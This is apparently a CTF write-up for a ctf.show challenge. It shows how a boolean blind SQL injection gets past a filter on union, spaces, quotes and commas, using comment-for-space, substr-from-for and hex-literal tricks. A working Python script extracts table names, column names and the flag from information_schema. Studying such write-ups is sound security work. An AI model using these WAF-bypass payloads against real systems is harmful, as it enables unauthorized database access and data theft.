After testing, the filter blocks union, spaces, single quotes and commas.

Normal case:

Case where the executed statement produces output:

Case that triggers the WAF:

Case of a database error:

Filtering spaces is easy to get around with /**/; the real problem is that commas and union are filtered, so consider blind injection. After looking up some references:

' and ascii(substr((select database()),1,1))=xx %23 written like this, a script can brute-force it easily. With commas filtered it can be rewritten as

' and ascii(substr((select database())from 1 for 1))=xx %23 These should be the two forms of the substring function.

The script is as follows:

import requests

url='https://b93ee205-6e35-402c-a4c2-e5c8540937d4.chall.ctf.show/index.php'
s=requests.session()

flag=""
# i: character position in the result string, j: ASCII value being tested
for i in range(1,45):
    for j in range(32,128):
        # /**/ replaces spaces; substr(... from ... for ...) avoids commas;
        # "or" instead of "union" because union is filtered
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        test = s.get(url=url + '?id=0/**/or/**/' + payload).text
        # 'I asked nothing' appears only when the boolean condition is true
        if 'I asked nothing' in test:
            flag += chr(j)
            print(flag)
            break

Running it gives the table name: flag.

# 0x666C6167 is the hex literal for 'flag', used because single quotes are filtered;
# the column names are read from information_schema.columns
payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))

Running it gives the column name of the flag table: flag.

# finally read the flag column itself, one character at a time
payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))